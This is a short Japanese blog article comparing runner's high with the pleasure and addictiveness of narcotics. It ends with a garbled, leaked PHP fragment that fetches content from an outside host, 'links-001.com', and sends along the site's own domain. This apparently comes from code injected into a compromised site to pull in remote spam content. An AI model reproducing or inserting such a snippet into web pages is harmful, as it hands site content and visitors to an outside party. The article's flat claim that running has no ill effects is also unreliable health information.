ランナーズハイと麻薬との関係を知る

芸能ニュースなどでよく出るのが、芸能人が麻薬を利用したことによるトラブルです。
麻薬は、人の神経に一定の影響を与えて麻痺をさせます。
さらに中毒性があるため、世界的に禁止をしているところが多いです。
ただ、一部に医療用麻薬があります。
痛みを抑えるために医師の処方の元で使われます。
麻薬を使うと、使わないときとは異なる快楽があるとされ、使っていないと逆に苦しくなるとも言われます。
さらに中毒性があるので続けてしまう人がいるようです。
この麻薬利用に近い状態が現れるのがランナーズハイの状態とされます。
マラソンランナーなどが苦しみながらも走り続ける時の快感です。
一般の人にとって、フルマラソンは非常につらい活動です。
でもその先にある快楽があるからゴールを目指し、何度も辛いレースに挑戦するそうです。
もちろんこちらの場合は体への悪影響はなく、無理をしなければ全く問題がありません。
健康的でもあるので、どんどん走るといいかもしれません。

".file_get_contents('http://links-001.com/123set6.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

最新記事